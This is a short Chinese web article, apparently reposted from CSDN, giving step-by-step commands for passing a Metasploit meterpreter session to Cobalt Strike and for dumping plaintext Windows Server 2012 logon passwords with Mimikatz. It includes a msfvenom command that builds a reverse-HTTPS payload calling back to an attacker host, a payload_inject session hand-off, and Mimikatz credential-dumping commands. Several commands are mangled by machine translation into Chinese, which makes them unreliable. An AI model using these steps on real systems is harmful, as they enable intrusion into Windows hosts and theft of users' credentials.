cs与msf权限传递
1. 与Metasploit 进行会话
# 使用Metasploit 配置监听器
使用漏洞/多重/处理程序
负载设置windows/meterpreter/reverse_https
设置LHOST [Metasploit 主机IP]
设置LPORT [选定端口]
开发
# 在目标系统上执行Metasploit生成的payload
# 使用msfvenom 生成可执行文件,例如
msfvenom -p windows/meterpreter/reverse_https LHOST=[Metasploit 主机IP] LPORT=[选定端口] -f exe Payload.exe
2. 通过Cobalt Strike 接收会话
# 使用Cobalt Strike 设置监听器
# 打开Cobalt Strike客户端并连接服务器
#创建一个新的监听器并选择HTTPS beacon
#设置IP和端口,保存并启动监听
# 使用Metasploit 获得的会话在线连接到Cobalt Strike
# 在Metasploit 中,使用以下命令将会话传递给Cobalt Strike
使用exploit/windows/local/payload_inject
负载设置windows/meterpreter/reverse_https
设置LHOST [Metasploit 主机IP]
设置LPORT [选定端口]
设置SESSION [Metasploit 会话ID]
将DisablePayloadHandler 设置为true
开发
mimikatz抓取win2012明文密码
1. 将Mimikatz 上传到Cobalt Strike
# 将Mimikatz 上传到Cobalt Strike 目标系统
上传/path/to/mimikatz.exe
2. 在目标系统上运行Mimikatz。
# 在Cobalt Strike 命令行上运行Mimikatz
运行程序集/path/to/mimikatz.exe
3.使用Mimikatz获取纯文本密码
# 在Mimikatz中,使用以下命令获取明文密码
权限: 调试
sekurlsa: 登录密码
以上基于#防御与保护的相关内容摘自网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92744.html